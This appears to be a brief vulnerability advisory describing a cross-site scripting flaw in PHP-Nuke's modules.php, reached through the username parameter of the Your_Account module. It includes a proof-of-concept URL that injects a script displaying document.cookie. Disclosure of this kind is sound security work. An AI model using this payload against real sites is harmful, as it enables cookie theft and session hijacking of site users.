PHP-Nuke Modules.PHP Username URI Parameter Cross Site Scripting Vulnerability

PHP-Nuke Modules.PHP Username URI Parameter Cross Site Scripting Vulnerability

The following proof of concept was provided:

http://[victim]/modules.php?name=Your_Account&op=userinfo&
username=bla<script>alert(document.cookie)</script>